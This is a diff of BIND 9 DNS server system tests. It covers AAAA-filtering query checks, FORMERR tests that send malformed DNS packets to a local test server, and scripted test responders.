$n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns2.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep 2001:db8::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep AAAA dig.out.ns2.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, signed ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4 ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + + +# +# Recursive tests against: +# filter-aaaa-on-v6 yes; +# filter-aaaa { fd92:7065:b8e:ffff::3; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep ::5 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns3.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep 2001:db8::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep AAAA dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# We don't check for the AAAA record here as configuration in ns5 does +# not make sense. The AAAA record is wanted by filter-aaaa but discarded +# by the dns64 configuration. We just want to ensure the server stays +# running. +n=`expr $n + 1` +echo_i "checking filter-aaaa with dns64 ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "status: NOERROR" dig.out.ns5.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/formerr/clean.sh b/bin/tests/system/formerr/clean.sh new file mode 100644 index 0000000..e525530 --- /dev/null +++ b/bin/tests/system/formerr/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f nametoolong.out +rm -f twoquestions.out +rm -f noquestions.out +rm -f ns*/named.conf +rm -f ns*/named.lock +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/formerr/formerr.pl b/bin/tests/system/formerr/formerr.pl new file mode 100644 index 0000000..0c68274 --- /dev/null +++ b/bin/tests/system/formerr/formerr.pl @@ -0,0 +1,97 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a tool for sending an arbitrary packet via UDP or TCP to an +# arbitrary address and port. The packet is specified in a file or on +# the standard input, in the form of a series of bytes in hexadecimal. +# Whitespace is ignored, as is anything following a '#' symbol. +# +# For example, the following input would generate normal query for +# isc.org/NS/IN": +# +# # QID: +# 0c d8 +# # header: +# 01 00 00 01 00 00 00 00 00 00 +# # qname isc.org: +# 03 69 73 63 03 6f 72 67 00 +# # qtype NS: +# 00 02 +# # qclass IN: +# 00 01 +# +# Note that we do not wait for a response for the server. This is simply +# a way of injecting arbitrary packets to test server resposnes. +# +# Usage: packet.pl [-a <address>] [-p <port>] [-t (udp|tcp)] [filename] +# +# If not specified, address defaults to 127.0.0.1, port to 53, protocol +# to udp, and file to stdin. +# +# XXX: Doesn't support IPv6 yet + +require 5.006_001; + +use strict; +use Getopt::Std; +use IO::File; +use IO::Socket; + +sub usage { + print ("Usage: packet.pl [-a address] [-p port] [file]\n"); + exit 1; +} + +my %options={}; +getopts("a:p:", \%options); + +my $addr = "127.0.0.1"; +$addr = $options{a} if defined $options{a}; + +my $port = 53; +$port = $options{p} if defined $options{p}; + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + $line =~ s/#.*$//; + $input .= $line; +} + +$input =~ s/\s+//g; +my $data = pack("H*", $input); +my $len = length $data; + +my $output = unpack("H*", $data); +print ("sending: $output\n"); + +my $sock = IO::Socket::INET->new(PeerAddr => $addr, PeerPort => $port, + Proto => "tcp") or die "$!"; + +my $bytes; +$bytes = $sock->syswrite(pack("n", $len), 2); +$bytes = $sock->syswrite($data, $len); +$bytes = $sock->sysread($data, 2); +$len = unpack("n", $data); +$bytes = $sock->sysread($data, $len); +print "got: ", unpack("H*", $data). "\n"; + +$sock->close; +close $file; diff --git a/bin/tests/system/formerr/nametoolong b/bin/tests/system/formerr/nametoolong new file mode 100644 index 0000000..b81545f --- /dev/null +++ b/bin/tests/system/formerr/nametoolong @@ -0,0 +1,19 @@ +00 00 00 00 00 01 00 00 00 00 00 00 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 +00 01 +00 01 diff --git a/bin/tests/system/formerr/noquestions b/bin/tests/system/formerr/noquestions new file mode 100644 index 0000000..f087bcd --- /dev/null +++ b/bin/tests/system/formerr/noquestions @@ -0,0 +1 @@ +00 00 00 00 00 00 00 00 00 00 00 00 diff --git a/bin/tests/system/formerr/ns1/named.conf.in b/bin/tests/system/formerr/ns1/named.conf.in new file mode 100644 index 0000000..07aaf21 --- /dev/null +++ b/bin/tests/system/formerr/ns1/named.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/formerr/ns1/root.db b/bin/tests/system/formerr/ns1/root.db new file mode 100644 index 0000000..f4d4c69 --- /dev/null +++ b/bin/tests/system/formerr/ns1/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.4 diff --git a/bin/tests/system/formerr/setup.sh b/bin/tests/system/formerr/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/formerr/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/formerr/tests.sh b/bin/tests/system/formerr/tests.sh new file mode 100644 index 0000000..0e2bca4 --- /dev/null +++ b/bin/tests/system/formerr/tests.sh @@ -0,0 +1,47 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +echo_i "test name too long" +$PERL formerr.pl -a 10.53.0.1 -p ${PORT} nametoolong > nametoolong.out +ans=`grep got: nametoolong.out` +if [ "${ans}" != "got: 000080010000000000000000" ]; +then + echo_i "failed"; status=`expr $status + 1`; +fi + +echo_i "two questions" +$PERL formerr.pl -a 10.53.0.1 -p ${PORT} twoquestions > twoquestions.out +ans=`grep got: twoquestions.out` +if [ "${ans}" != "got: 000080010000000000000000" ]; +then + echo_i "failed"; status=`expr $status + 1`; +fi + +# this would be NOERROR if it included a COOKIE option, +# but is a FORMERR without one. +echo_i "empty question section (and no COOKIE option)" +$PERL formerr.pl -a 10.53.0.1 -p ${PORT} noquestions > noquestions.out +ans=`grep got: noquestions.out` +if [ "${ans}" != "got: 000080010000000000000000" ]; +then + echo_i "failed"; status=`expr $status + 1`; +fi + +echo_i "exit status: $status" + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/formerr/twoquestions b/bin/tests/system/formerr/twoquestions new file mode 100644 index 0000000..2192e3d --- /dev/null +++ b/bin/tests/system/formerr/twoquestions @@ -0,0 +1,7 @@ +00 00 00 00 00 02 00 00 00 00 00 00 +0e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 +00 01 +00 02 +0e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 +00 01 +00 01 diff --git a/bin/tests/system/forward/ans11/ans.py b/bin/tests/system/forward/ans11/ans.py new file mode 100644 index 0000000..e8f1195 --- /dev/null +++ b/bin/tests/system/forward/ans11/ans.py @@ -0,0 +1,143 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +############################################################################ +# Respond to a DNS query. +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, qname)) + print("%s %s" % (typename, qname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + if rrtype == A: + tld = qname.split(".")[-2] + "." + ns = "local." + tld + r.answer.append(dns.rrset.from_text(qname, 300, IN, A, "10.53.0.11")) + r.answer.append(dns.rrset.from_text(tld, 300, IN, NS, "local." + tld)) + r.additional.append(dns.rrset.from_text(ns, 300, IN, A, "10.53.0.11")) + elif rrtype == NS: + r.answer.append(dns.rrset.from_text(qname, 300, IN, NS, ".")) + elif rrtype == SOA: + r.answer.append(dns.rrset.from_text(qname, 300, IN, SOA, ". . 0 0 0 0 0")) + else: + r.authority.append(dns.rrset.from_text(qname, 300, IN, SOA, ". . 0 0 0 0 0")) + r.flags |= dns.flags.AA + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.11" +ip6 = "fd92:7065:b8e:ffff::11" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/forward/ans6/ans.pl b/bin/tests/system/forward/ans6/ans.pl new file mode 100644 index 0000000..6102e4a --- /dev/null +++ b/bin/tests/system/forward/ans6/ans.pl @@ -0,0 +1,562 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# This is the name server from hell. It provides canned +# responses based on pattern matching the queries, and +# can be reprogrammed on-the-fly over a TCP connection. +# +# The server listens for queries on port 5300 (or PORT). +# +# The server listens for control connections on port 5301 (or EXTRAPORT1). +# +# A control connection is a TCP stream of lines like +# +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# +# There can be any number of patterns, each associated +# with any number of response RRs. Each pattern is a +# Perl regular expression. If an empty pattern ("//") is +# received, the server will ignore all incoming queries (TCP +# connections will still be accepted, but both UDP queries +# and TCP queries will not be responded to). If a non-empty +# pattern is then received over the same control connection, +# default behavior is restored. +# +# Each incoming query is converted into a string of the form +# "qname qtype" (the printable query domain name, space, +# printable query type) and matched against each pattern. +# +# The first pattern matching the query is selected, and +# the RR following the pattern line are sent in the +# answer section of the response. +# +# Each new control connection causes the current set of +# patterns and responses to be cleared before adding new +# ones. +# +# The server handles UDP and TCP queries. Zone transfer +# responses work, but must fit in a single 64 k message. +# +# Now you can add TSIG, just specify key/key data with: +# +# /pattern <key> <key_data>/ +# name ttl type rdata +# name ttl type rdata +# +# Note that this data will still be sent with any request for +# pattern, only this data will be signed. Currently, this is only +# done for TCP. +# +# /pattern bad-id <key> <key_data>/ +# /pattern bad-id/ +# +# 